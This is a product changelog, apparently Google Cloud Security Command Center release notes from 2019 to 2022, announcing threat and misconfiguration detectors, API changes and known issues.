Event Threat Detection, a built-in service of Security Command Center, launched the Exfiltration: BigQuery Data to Google Drive rule to Preview. This rule detects events where the protected organization's BigQuery data is saved, through extraction operations, to a Google Drive folder. For more information, see Event Threat Detection rules.

January 31, 2022

Virtual Machine Threat Detection, a built-in service of Security Command Center Premium, is in Preview. During the Preview, VM Threat Detection detects cryptocurrency mining software, which is among the most common types of software installed in compromised cloud environments.

For more information, see Virtual Machine Threat Detection conceptual overview.

Web Security Scanner, a built-in service of Security Command Center, released the CACHEABLE_PASSWORD_INPUT and SESSION_ID_LEAK finding types.

For more information, see Web Security Scanner findings.

Web Security Scanner, a built-in service of Security Command Center, provides detectors for the OWASP Top 10 2017 and OWASP Top 10 2021. For more information, see Detectors and Compliance.

January 26, 2022

Security Command Center supports CIS Google Cloud Computing Foundations Benchmark v1.2.0 (CIS Google Cloud Foundation 1.2.0).

The following detectors have been added:

  • BIGQUERY_TABLE_CMEK_DISABLED
  • CONFIDENTIAL_COMPUTING_DISABLED
  • DNS_LOGGING_DISABLED
  • SQL_EXTERNAL_SCRIPTS_ENABLED
  • SQL_LOG_DURATION_DISABLED
  • SQL_LOG_ERROR_VERBOSITY
  • SQL_LOG_EXECUTOR_STATS_ENABLED
  • SQL_LOG_HOSTNAME_ENABLED
  • SQL_LOG_MIN_ERROR_STATEMENT_SEVERITY
  • SQL_LOG_MIN_MESSAGES
  • SQL_LOG_PARSER_STATS_ENABLED
  • SQL_LOG_PLANNER_STATS_ENABLED
  • SQL_LOG_STATEMENT
  • SQL_LOG_STATEMENT_STATS_ENABLED
  • SQL_REMOTE_ACCESS_ENABLED
  • SQL_SKIP_SHOW_DATABASE_DISABLED
  • SQL_TRACE_FLAG_3625
  • SQL_USER_CONNECTIONS_CONFIGURED
  • SQL_USER_OPTIONS_CONFIGURED

For more information, see Detectors and compliance.

January 24, 2022

Web Security Scanner, a built-in service of Security Command Center, released the SQL_INJECTION and STRUTS_INSECURE_DESERIALIZATION finding types.

For more information, see Web Security Scanner findings.

January 10, 2022

Web Security Scanner, a built-in service of Security Command Center, released the INSECURE_ALLOW_ORIGIN_ENDS_WITH_VALIDATION, INSECURE_ALLOW_ORIGIN_STARTS_WITH_VALIDATION, and XXE_REFLECTED_FILE_LEAKAGE finding types.

For more information, see Web Security Scanner findings.

December 30, 2021

Security Health Analytics, a built-in service of Security Command Center, launched the DATAPROC_IMAGE_OUTDATED detector to General Availability. This detector finds clusters created with Dataproc image versions that are affected by security vulnerabilities in the Apache Log4j 2 utility (CVE-2021-44228 and CVE-2021-45046). For more information, see Dataproc vulnerability findings.

December 21, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Active Scan: Log4j Vulnerable to RCE rule to General Availability. This rule detects active Log4j vulnerabilities by identifying DNS queries for unobfuscated domains that were initiated by supported Log4j vulnerability scanners. For more information, see Event Threat Detection rules.

December 16, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Initial Access: Log4j Compromise Attempt rule to General Availability. This rule detects Java Naming and Directory Interface (JNDI) lookups within headers or URL parameters. These lookups may indicate attempts at Log4Shell exploitation. For more information, see Event Threat Detection rules.

December 13, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Persistence: New API Method rule to Preview. This rule detects anomalous API behavior by examining Cloud Audit Logs for requests to Google Cloud services that a principal has not seen before. For more information, see Event Threat Detection rules.

December 10, 2021

Event Threat Detection, a built-in service of Security Command Center, launched the Evasion: Access from Anonymizing Proxy rule to General Availability. This rule detects Google Cloud service modifications that originated from anonymous proxy IP addresses, like Tor IP addresses. For more information, see Event Threat Detection rules.

December 07, 2021

To facilitate the flow of information between Security Command Center and third-party systems, a resource called ExternalSystems was added under the Finding object. A finding can contain multiple ExternalSystems fields.

The ExternalSystems resource can contain any of the following:

  • Third-party SIEM/SOAR fields within Security Command Center
  • External system information
  • External system finding fields

A caller with the Security Center External Systems Editor (roles/securitycenter.externalSystemsEditor) IAM role can update an ExternalSystems object using the organizations.sources.findings.externalSystems.patch API.

Event Threat Detection, a built-in service of Security Command Center, released the Exfiltration: BigQuery Data Extraction rule. This rule is available in Preview. It detects events where an organization's BigQuery data is exported to an externally visible Cloud Storage bucket. For more information, see Event Threat Detection rules.

November 19, 2021

Security Command Center has launched Mute Findings in general availability.

Mute Findings is a powerful volume management feature that lets you create filters to automatically hide or suppress current and future findings based on criteria you specify. The feature can save you time from reviewing or responding to security findings for assets that are isolated, fall within acceptable business parameters, or aren't relevant to your organization based on your company's policies.

To learn more, see Mute findings in Security Command Center.

November 17, 2021

Web Security Scanner, a built-in service of Security Command Center, released the SERVER_SIDE_REQUEST_FORGERY finding type in general availability.

For more information, see Remediating Web Security Scanner findings.

October 26, 2021

An issue that resulted in Security Command Center incorrectly reporting findings for some monitoring vulnerability detectors has been fixed.

Due to changes made on September 20, 2020 in the logging source upon which FIREWALL_NOT_MONITORED, NETWORK_NOT_MONITORED, ROUTE_NOT_MONITORED, and SQL_INSTANCE_NOT_MONITORED findings in Security Health Analytics are predicated, the remediation instructions for those findings were inaccurate.

The issue is resolved. Findings are being generated accurately and you are being properly alerted of misconfigurations in your organization.

If you want to enable monitoring in order to remediate these findings, you will need to update the logs-based metrics for these findings. Updated filters are available in the findings themselves and product documentation:

If you have questions or need assistance, contact Google Cloud Support or Google Cloud Billing Support.

October 25, 2021

The following detectors for unsafe Google Groups changes are generally available (GA):

  • Credential Access: Privileged Group Opened To Public
  • Credential Access: Sensitive Role Granted To Hybrid Group
  • Credential Access: External Member Added To Privileged Group

For more information, see Unsafe Google Groups changes.

October 13, 2021

Event Threat Detection, a built-in service of Security Command Center Premium, launched an integration with Chronicle that lets you perform advanced analysis of threat findings.

The integration lets you seamlessly send findings to Chronicle, a Google Cloud service that you can use to investigate threats and pivot through related actions and events in a unified timeline. Chronicle enriches Event Threat Detection findings, helping you identify indicators of interest and simplify investigations.

To learn more about Chronicle, see Chronicle overview. For instructions on sending Event Threat Detection findings to Chronicle, see Investigate findings in Chronicle.

October 05, 2021

Security Health Analytics, a built-in service of Security Command Center, released new detectors in general availability.

The following detectors, available only in Security Command Center's Premium tier, detect vulnerabilities in your Google Kubernetes Engine clusters and expand the number of detectors that support the CIS Google Kubernetes Engine (GKE) Benchmark v1.0.0:

For more information, see Container vulnerability findings. To learn how to remediate vulnerabilities, see Remediating Security Health Analytics findings

September 14, 2021

Event Threat Detection, a built-in service of Security Command Center Premium, has launched new detectors in public preview.

The following detectors monitor your Google Workspace and Cloud Audit logs and alert you when external members are added to privileged Google Groups—groups that are granted sensitive IAM roles and permissions:

  • Credential Access: Privileged Group Joinability Risk: Detects when Google Groups are changed to be accessible to the general public
  • Persistence: IAM Anomalous Group Grant: Detects when sensitive roles are granted to privileged Google Groups with external members
  • Credential Access: External Member In Privileged Group: Detects when an external member is added to a privileged Google Group

The following detectors monitor your Admin Activity logs and alert you to suspicious changes in Compute Engine instances:

  • Persistence: Compute Engine Admin Added SSH Key: Detects modification of the Compute Engine instance metadata ssh key value on established instances
  • Persistence: Compute Engine Admin Added Startup Script: Detects modification of the Compute Engine instance metadata startup script value on established instances

The Persistence: IAM Anomalous Grant detector is enhanced and detects when sensitive roles are granted to users and service accounts.

For more information on Event Threat Detection findings, see Rules. To learn how Event Threat Detection monitors changes in Google Groups and defines sensitive roles, see Unsafe Google Group changes.

September 07, 2021

VM Manager vulnerability reports, which are in preview, are now available in Security Command Center Premium. The reports identify vulnerabilities in operating systems installed on Compute Engine virtual machines, including Common Vulnerabilities and Exposures (CVEs).

For more information on integrating VM Manager with Security Command Center, see VM Manager.

August 11, 2021

Event Threat Detection, a built-in service of Security Command Center Premium, has launched new detectors to protect your Google Workspace domains in general availability. The detectors identify suspicious activities in member accounts and your Admin Console, including leaked passwords, attempted account breaches, settings changes, and possible government-backed attacks. For more information, see Event Threat Detection overview.

Container Threat Detection, a built-in service of Security Command Center Premium, has launched a new detector, Malicious Script Executed, in general availability. The detector uses natural language processing to evaluate bash scripts and determine if they are malicious. For more information, see Container Threat Detection overview

Security Command Center findings now include two new attributes that provide additional information about the type of finding and the activity that triggered it. The attributes include the following:

  • Indicator: displayed as indicator. This is an indicator of compromise (IoC), or artifact, observed on a network or in an operating system that, with high confidence, indicates a computer intrusion.
  • Finding Class: displayed as findingClass. Indicates the type of finding. The following list includes finding classes and their descriptions:
    • Threat: unwanted or malicious activity
    • Vulnerability: a potential weakness in software that increases risk to the confidentiality, integrity, and availability of your resources
    • Misconfiguration: a potential weakness in a resource's configuration that increases risk
    • Observation: a security observation provided for informational purposes

To learn more about findings, see the Findings tab in Using the Security Command Center dashboard.

Documentation

  • Security Command Center documentation now includes a page that maps resource type formats between Cloud Asset Inventory and Security Command Center. The services use different naming conventions for resource types. For more information, see Resource type formats in Security Command Center.

July 19, 2021

Security Health Analytics, a built-in service of Security Command Center, has launched a new detector, DATASET_CMEK_DISABLED, in general availability. The detector, available to Security Command Center Premium customers, detects BigQuery datasets that are not encrypted using customer-managed encryption keys (CMEK). For more information, see the DATASET_SCANNER table in Vulnerabilities findings.

Event Threat Detection, a built-in service of Security Command Center Premium, has launched a public preview of new detectors to protect your Google Workspace domains. The detectors identify suspicious activities in member accounts and your Admin Console, including leaked passwords, attempted account breaches, settings changes, and possible government-backed attacks. For more information, see Event Threat Detection overview.

June 07, 2021

Security Command Center Legacy, previously known as Cloud Security Command Center, and Event Threat Detection Legacy have been permanently disabled.

To continue benefiting from Security Command Center, you must migrate your organizations to Security Command Center's free Standard tier or Premium tier. Event Threat Detection, a built-in service of Security Command Center, is available only in the Premium tier.

For information on upgrading to Security Command Center Standard or Premium, see Migrate from legacy Security Command Center products. To inquire about flexible pricing options for the Premium tier, complete our Premium inquiry form. You should receive a response within two US business days.

May 24, 2021

Security Command Center Premium has launched project- and folder-level roles in general availability. The feature lets you grant users Identity and Access Management (IAM) roles for specific folders and projects. You have more granular control over who can access what resources throughout your organization. For more information, see Access control.

You must be a Security Command Center Premium customer to use this feature. Security Command Center Standard continues to support granting roles only at the organization level. To subscribe to Security Command Center Premium, contact your sales representative or fill out our inquiry form.

Security Command Center now supports two versions of CIS Benchmarks for Google Cloud Platform Foundation:

  • CIS Google Cloud Computing Foundations Benchmark v1.1.0 (CIS Google Cloud Foundation 1.1)
  • CIS Google Cloud Computing Foundations Benchmark v1.0.0 (CIS Google Cloud Foundation 1.0)

For more information about supported compliance standards, see Detectors and compliance.

Security Health Analytics, a built-in service of Security Command Center, has expanded the number of detectors in the Standard tier. The Standard tier, which is free of charge, now includes the following detectors:

  • LEGACY_AUTHORIZATION_ENABLED: Legacy Authorization is enabled on Google Kubernetes Engine (GKE) clusters.
  • OPEN_CISCOSECURE_WEBSM_PORT: A firewall is configured to have an open CISCOSECURE_WEBSM port that allows generic access.
  • OPEN_DIRECTORY_SERVICES_PORT: A firewall is configured to have an open DIRECTORY_SERVICES port that allows generic access.
  • OPEN_TELNET_PORT: A firewall is configured to have an open TELNET port that allows generic access.
  • PUBLIC_COMPUTE_IMAGE: A Compute Engine image is publicly accessible.

For a complete list of detectors in the Standard tier, see Pricing. For detailed information about all Security Health Analytics detectors, see Vulnerabilities findings.

May 05, 2021

Security Command Center Premium has launched Continuous Exports for Pub/Sub in general availability. The feature simplifies the process of creating a NotificationConfig and automates the export of new findings to Pub/Sub.

You must be a Security Command Center Premium customer to use the feature. Security Command Center Standard continues to support one-time exports. To subscribe to Security Command Center Premium, contact your sales representative or fill out our inquiry form.

Security Health Analytics, a built-in service of Security Command Center, has launched a new detector, PUBSUB_CMEK_DISABLED, in general availability. The detector, available to Security Command Center Premium customers, identifies Pub/Sub topics that are not encrypted with customer-managed encryption keys (CMEK). For more information, see the PUBSUB_SCANNER table in Vulnerabilities findings.

Event Threat Detection, a built-in service of Security Command Center, has launched a new detector in general availability. Discovery: Service Account Self-Investigation detects when a service account credential is used to investigate the roles associated with that same service account. For more information on detectors, see Event Threat Detection conceptual overview.

Documentation

April 07, 2021

Security Command Center Legacy, previously known as Cloud Security Command Center, and Event Threat Detection Legacy are being permanently disabled for all customers on June 7, 2021.

If you onboarded to Security Command Center before May 2020, or Event Threat Detection before June 2020, and never upgraded to Security Command Center's Standard tier or Premium tier, you are using a legacy product.

To continue benefiting from Security Command Center and Event Threat Detection without an interruption in service, customers using legacy products must migrate their organizations to Security Command Center Standard or Premium. Event Threat Detection, a built-in service of Security Command Center, is available only in the Premium tier.

For details on upgrading legacy products, see Migrate from legacy Security Command Center products.

March 08, 2021

Security Health Analytics, a built-in service of Security Command Center, launched new detectors in general availability:

Detects resources that are not using customer-managed encryption keys (CMEK)

  • BUCKET_CMEK_DISABLED
  • DISK_CMEK_DISABLED
  • NODEPOOL_BOOK_CMEK_DISABLED
  • SQL_CMEK_DISABLED

Detects vulnerabilities in Compute Engine instances

  • DEFAULT_SERVICE_ACCOUNT_USED
  • SHIELDED_VM_DISABLED

Detects publicly accessible Cloud KMS keys

  • KMS_PUBLIC_KEY

Detects out-of-region Compute Engine resources

  • ORG_POLICY_LOCATION_RESTRICTION

Detects misconfiguration of SQL instances

  • SQL_CROSS_DB_OWNERSHIP_CHAINING
  • SQL_CONTAINED_DATABASE_AUTHENTICATION
  • SQL_CROSS_DB_OWNERSHIP_CHAINING
  • SQL_LOCAL_INFILE
  • SQL_LOG_CHECKPOINTS_DISABLED
  • SQL_LOG_CONNECTIONS_DISABLED
  • SQL_LOG_DISCONNECTIONS_DISABLED
  • SQL_LOG_LOCK_WAITS_DISABLED
  • SQL_LOG_MIN_DURATION_STATEMENT_ENABLED
  • SQL_LOG_MIN_ERROR_STATEMENT
  • SQL_LOG_TEMP_FILES

For more information on these and other Security Health Analytics detectors, see Vulnerabilities findings.

Event Threat Detection, a built in service of Security Command Center, launched a preview for a new detector.

Service account self-investigation detects when a service account is used to investigate roles associated with that same service account. For more information on Event Threat Detection detectors, see Event Threat Detection conceptual overview.

Documentation

  • Security Health Analytics documentation now includes more detailed information about detectors, including supported assets and scan configurations. For more information, see Vulnerabilities findings.

  • The Security Health Analytics remediation page now includes suggested instructions to resolve all Security Health Analytics findings. For more information, see Remediating Security Health Analytics findings.

  • Event Threat Detection documentation now includes additional details on cloud logs used by the service. For more information, see Event Threat Detection conceptual overview.

February 05, 2021

Security Command Center's v1 API now includes a Severity field for Findings.

The Severity field indicates the severity of a finding, as determined by the finding provider, and is included with all findings. The field is managed by finding providers and you are cautioned to not modify its values.

Uses for the field include listing findings of a certain severity level or grouping findings by severity level.

Read Using the Security Command Center dashboard to learn more about findings and finding severity.

Event Threat Detection, a built-in service of Security Command Center Premium, has launched previews for two new detectors.

IAM: Anomalous IP geolocation and IAM: Anomalous user agent detect anomalous connections to Google Cloud resources based on location and user agent, respectively.

Read more about available detectors in Event Threat Detection conceptual overview.

Documentation

December 01, 2020

Container Threat Detection, a built-in service of Security Command Center Premium, is now in general availability. Read these notes to learn about updates, usability improvements, and new features. See our blog post, Monitor and secure your containers with new Container Threat Detection, to learn more.

Container Threat Detection now supports Google Kubernetes Engine (GKE) versions on the Stable channel. There are currently no plans to add support for GKE version 1.14.

Activation latency for newly created clusters has been improved.

A bug that blocked some information from appearing in the the process section of Added Library Loaded findings is fixed.

A bug that blocked the proper display of the resource name for regional clusters in Added Library Loaded findings is fixed.

Container Threat Detection documentation includes updated information about compatibility with GKE and Virtual Private Cloud.

Read Using Container Threat Detection for more information.

October 08, 2020

Event Threat Detection, a built-in service of Security Command Center Premium, now includes two new detectors to monitor your organization's BigQuery resources. The detectors identify data exfiltration - resources saved outside of your organization or attempts to access protected data.

Read more about available detectors in Event Threat Detection conceptual overview.

The Security Command Center API now includes a severity field for Findings. This feature is available using Security Command Center's v1p1beta1 API.

September 08, 2020

Security Command Center Premium is now in general availability (Container Threat Detection remains in beta). Read these notes to learn about updates, usability improvements, and new features.

Improved Summary Dashboard

  • A new set of interactive charts and tables provide a high-level overview of all threats and vulnerabilities.
  • An updated time selector lets you choose preset and customizable time ranges for reviewing findings and creating reports.
  • New page headers provide users with more page-specific context.

Learn more about Using the Security Command Center dashboard.

Onboarding and configuration upgrades

  • A streamlined interface lets you manage organization-wide service enablement settings.
  • A dedicated settings page for integrated services has been added to the configuration interface.

Learn more about Setting up Security Command Center.

Security Health Analytics now supports real-time detections, with some exceptions. Read more about Security Health Analytics detectors and findings.

Managed Web Security Scans are now available to all Security Command Center Premium users. Learn more about managed scans in our Overview of Web Security Scanner.

gcloud integration with new, simplified Beta APIs (Alpha)

  • The gcloud command line interface can now access configuration functionality through new Beta APIs. The Beta APIs provide stable, programmatic interaction equivalent in functionality to the Security Command Center interface. Learn to use gcloud to manage Security Command Center settings.

Documentation

August 24, 2020

Audit logs are now available in Security Command Center as part of Cloud Audit Logs. Learn more about Security Command Center audit logging.

July 27, 2020

Security Command Center v1beta1 API will be disabled on Jan. 31, 2021. All users will be required to migrate to Security Command Center v1 API, which is now in general availability.

  • Update to Google-provided v1 API client libraries.
  • Move your client libraries and HTTP/grpc calls to v1 by following instructions in the reference documentation for service endpoints and SDK configuration.
  • If you call this service using your own libraries, follow the guidance in our Security Command Center API Overview when making API requests.
  • To use ListFindings calls in the v1 API, update your response handling to respond to an extra layer of object nesting, as shown below:
    • v1beta1: response.getFindings().forEach( x -> ....)
    • v1: response.getListFindingsResults().forEach(x -> { x.getFinding(); .... })

Additional changes to the v1 API are listed below. Learn more about Using the Security Command Center API.

The SeverityLevel finding source property for all Security Health Analytics findings will be removed and replaced with a field named Severity, which retains the same values.

  • Impact: Finding notification filters, post-processing, and alerting based on the SeverityLevel finding source property will no longer be possible.
  • Recommendation: Replace the SeverityLevel finding source property with the Severity finding attribute property to retain existing functionality.

The nodePools finding source property will be removed from the OVER_PRIVILEGED_SCOPES findings and replaced with a source property named VulnerableNodePools.

  • Impact: Finding notification filters, post-processing and alerting based on this finding source property may fail.
  • Recommendation: Modify workflows as necessary to utilize the new VulnerableNodePools source property.

The finding category of 2SV_NOT_ENFORCED is being renamed MFA_NOT_ENFORCED.

  • Impact: Case-sensitive finding notification filters, post-processing, and alerting based on the previous finding category name may fail.
  • Recommendation: Update any post-processing to use the new category name.

The ExceptionInstructions source property will be removed from all Security Health Analytics findings.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property may fail.
  • In progress: A new property that will indicate the current state of findings is being developed.

The ProjectId source property from all Security Health Analytics findings will be removed.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property may fail.
  • Recommendation: Update workflows to utilize the project id in the resource.project_display_name field of a ListFindingsResult.

The AssetSettings finding source property from PUBLIC_SQL_INSTANCE, SQL_PUBLIC_IP, SSL_NOT_ENFORCED, AUTO_BACKUP_DISABLED, SQL_NO_ROOT_PASSWORD, SQL_WEAK_ROOT_PASSWORD finding types will be removed, as it contains data duplicated from the asset entity.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will fail.
  • Recommendation: Replacing the AssetSettings finding source property with the Settings resource property from the asset underlying the finding will retain existing functionality.

The Allowed finding source property from OPEN_FIREWALL findings will be replaced with changed a new field named ExternallyAccessibleProtocolsAndPorts, which will contain a subset of the values from the Allowed property.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will fail.
  • Recommendation: Modify your workflows as necessary to utilize the new ExternallyAccessibleProtocolsAndPorts source property.

The SourceRanges finding source property from findings in OPEN_FIREWALL findings will be replaced with a new ExternalSourceRanges, which will contain a subset of the values from the SourceRanges property.

  • Impact: Finding notification filters, post-processing and alerting based on the finding source property will fail.
  • Recommendation: Modify your workflows as necessary to utilize the new ExternalSourceRanges source property.

As of Jan. 31, 2021, the UpdateFinding API will no longer support storing string properties that are longer than 7,000 characters.

  • Impact: Calls to UpdateFinding that seek to store string properties longer than 7,000 characters will be rejected with an invalid argument error.
  • Recommendation: Consider storing string properties longer than 7,000 characters as JSON structs or JSON lists. Learn more about writing findings.

As of Sept. 1, 2020, the ListFindings API will no longer support searching on finding properties that are longer than 7,000 characters.

  • Impact: Searches on strings that are longer than 7,000 characters will not return expected results. For example, if a partial string match filter has a match at the 7,005th character on a property in a finding, that finding will not be returned because that match is past the 7,000-character threshold. An exception will not be returned.
  • Recommendation: Customers can remove filter restrictions (e.g. x : "some-value") that are supposed to match very long properties. The results can then be filtered locally to remove findings whose strings do not match designated criteria. Learn more about filtering findings.

The OffendingIamRoles source property in extensions of IAM Scanner Configurations will use structured data instead of a JSON-formatted string.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will need to be updated to take advantage of the new data type on findings of the following categories: ADMIN_SERVICE_ACCOUNT, NON_ORG_IAM_MEMBER, PRIMITIVE_ROLES_USED, OVER_PRIVILEGED_SERVICE_ACCOUNT_USER, REDIS_ROLE_USED_ON_ORG, SERVICE_ACCOUNT_ROLE_SEPARATION, KMS_ROLE_SEPARATION.
  • Recommendation: Update workflows to utilize the new data type.

The QualifiedLogMetricNames source property in specific Monitoring findings from Security Health Analytics will use a list instead of a character-separated string value.

  • Impact: Finding notification filters, post-processing and alerting based on the finding source property will need to be updated to take advantage of the new data type for findings of the following categories: AUDIT_CONFIG_NOT_MONITORED, BUCKET_IAM_NOT_MONITORED, CUSTOM_ROLE_NOT_MONITORED, FIREWALL_NOT_MONITORED, NETWORK_NOT_MONITORED, OWNER_NOT_MONITORED, ROUTE_NOT_MONITORED, SQL_INSTANCE_NOT_MONITORED.
  • Recommendation: Update workflows to utilize the new data type.

The AlertPolicyFailureReasons source property in specific Monitoring findings from Security Health Analytics will use a list instead of a character-separated string value.

  • Impact: Finding notification filters, post-processing and alerting based on the finding source property will need to be updated to take advantage of the new data type for findings of the following categories: AUDIT_CONFIG_NOT_MONITORED, BUCKET_IAM_NOT_MONITORED, CUSTOM_ROLE_NOT_MONITORED, FIREWALL_NOT_MONITORED, NETWORK_NOT_MONITORED, OWNER_NOT_MONITORED, ROUTE_NOT_MONITORED, SQL_INSTANCE_NOT_MONITORED.
  • Recommendation: Update workflows to utilize the new data type.

The CompatibleFeatures source property in WEAK_SSL_POLICY findings will use a list instead of a character-separated string value.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will need to be updated to take advantage of the new data type for findings.
  • Recommendation: Update workflows to utilize the new data type.

May 12, 2020

Security Command Center Premium and Standard tiers are now available.

The Security Command Center Premium tier includes:

  • Security Health Analytics
  • Web Security Scanner managed scans
  • Event Threat Detection
  • Container Threat Detection

Learn more about the Security Command Center Premium tier.

The Event Threat Detection API will be deprecated in the coming months. Similar functionality is available in the Security Command Center API settings feature.

Container Threat Detection currently supports the following Kubernetes Engine versions on the Regular and Rapid channels:

  • >= 1.15.9-gke.12
  • >= 1.16.5-gke.2
  • >= 1.17

In a future update, Container Threat Detection will support version 1.14 and the Stable channel.

April 10, 2020

Security Health Analytics is now in general availability.

March 23, 2020

The Notifications API is now in general availability. Get started with the notifications API.

The eventType field was removed from organizations.notificationConfigs.create in the v1 API. Learn more about creating a NotificationConfig.

February 14, 2020

Security Command Center roles inherit Web Security Scanner roles as follows:

  • The securitycenter.adminViewer role inherits the permissions of the cloudsecurityscanner.viewer role.
  • The securitycenter.adminEditor role inherits the permissions of the cloudsecurityscanner.editor role.

For information about how to view all of the permissions that are associated with a role, see the IAM documentation about Getting the role metadata.

February 13, 2020

The notifications API is now in beta:

  • Send new findings and updated findings notifications to a Pub/Sub topic.
  • Filter notifications by provider source, finding type, category or any other finding fields, properties or security marks.

Get started with the notifications API.

Security Command Center tools will become obsolete in future Security Command Center releases, when their functionalities are added as built-in features. Support is offered on best-effort basis only for all Security Command Center tools.

November 11, 2019

Cloud SCC now supports full JSON with arrays and JSON objects as potential property types. This includes support for sorting on JSON object sub-fields, and filtering on:

  • Array elements
  • Full JSON objects with partial string match
  • JSON object sub-fields

Learn more about Filtering and sorting findings.

October 14, 2019

Security Health Analytics is now in beta and can now be enabled in the Sources Management page of Cloud SCC.

A new Vulnerabilities tab in Cloud SCC displays a dashboard that summarizes Security Health Analytics findings. This dashboard includes information about CIS benchmarks and recommended remediations.

Security Health Analytics no longer requires separate service account setup or permissions. Instead, it uses the Cloud SCC service account that's created for you during signup.

August 20, 2019

The following Security Health Analytics finding type names have changed:

Old Name New Name
LOGGING_DISABLED CLUSTER_LOGGING_DISABLED
MONITORING_DISABLED CLUSTER_MONITORING_DISABLED
NO_ROOT_PASSWORD SQL_NO_ROOT_PASSWORD
WEAK_ROOT_PASSWORD SQL_WEAK_ROOT_PASSWORD

August 05, 2019

API updated to v1.

findingType string XSS_CALLBACK changed to XSS.

May 10, 2019

Using VPC Service Controls currently blocks Cloud SCC asset discovery inside VPC Service perimeters for the following asset types:

  • Compute Engine
    • Addresses
    • Routes
    • VPN Tunnels
  • Cloud Storage Buckets
  • GKE Clusters

This is expected to be fixed in a future release.

For information about troubleshooting access issues, see VPC Service Controls Troubleshooting. To work around the access to these assets, see Granting access from the internet with access levels.

April 10, 2019

Cloud SCC is now in general availability (GA). These release notes include updated items from beta and new items for GA.

ListAssetResult has changed.

GroupFindingsResponse now includes totalSize.

gcloud command-line tool support for Cloud SCC is now available.

There are now client libraries available for C#, Go, Java, Node.JS, PHP, Python, and Ruby.

Previously only active state findings were shown in the UI. You can now also choose to show inactive state findings.

ListFindings and GroupFindings now supports comparison between two points in time. For more information, see the compareDuration parameter.

Assets now include IAM information for organizations, projects, Compute Engine, Cloud Storage, and others where applicable. IAM Policy information can be searched, filtered, and joined with all other Asset information and Security Marks.

Native integration with Security Health Analytics for native managed vulnerability scanning.

Native integration with Event Threat Detection for log-based threat detection.

Native integrations with Phishing Protection.

The Cloud SCC dashboard now enables you to select whether just active state findings are displayed or both active and inactive.

The Cloud SCC dashboard now enables you to set active or inactive state for each finding.

The Cloud SCC dashboard now enables you to perform a time-diff query for a fixed set of time periods.

You can now export Cloud SCC data as filtered Asset or Findings data to the Cloud Storage bucket and project you select.

Hello World example app is expanded to include Cloud Functions functions for: removing bucket ACLs, deleting firewall rules, and creating a VM snapshot.

New example apps are available for:

  • Integrations with Access Transparency Logs, Audit Logging, and Binary Authorization.
  • Connecting to Splunk.

For more information, see Installing Cloud SCC tools.

Additional security partner integrations through [Marketplace](https://console.cloud.google.com/marketplace/details/google-cloud-platform/cloud-security-command-center.

Sorting on Asset ID column on the asset page doesn't work as expected.

Sorting on the following findings page columns doesn't work as expected:

  • eventTime
  • source property
  • security mark
  • id
  • externalUri

Sorting isn't supported for source properties and security marks on the findings changed page.

After you've created a new asset, the new asset won't appear in Cloud SCC until it's re-scanned. To see current asset state before the daily re-scan, trigger an on-demand re-scan and then wait at least 5 minutes to see the new asset appear in Cloud SCC.

After you've made an IAM policy change on an asset, the updated policy won't appear in Cloud SCC until it's re-scanned. To see current IAM policy before the daily re-scan, trigger an on-demand re-scan and then wait at least 10 minutes to see the updated IAM policies in Cloud SCC.

Code examples are still in progress for C#, Node.js, PHP, and Ruby.

March 26, 2019

API updated to v1beta.

findingType field changed to string value

The findingType field has changed from an enum to a string in the Beta release of the Web Security Scanner API. You can find details in the Scan Result Details topic.

Web Security Scanner does not yet support applications protected by Cloud Identity-Aware Proxy (Cloud IAP).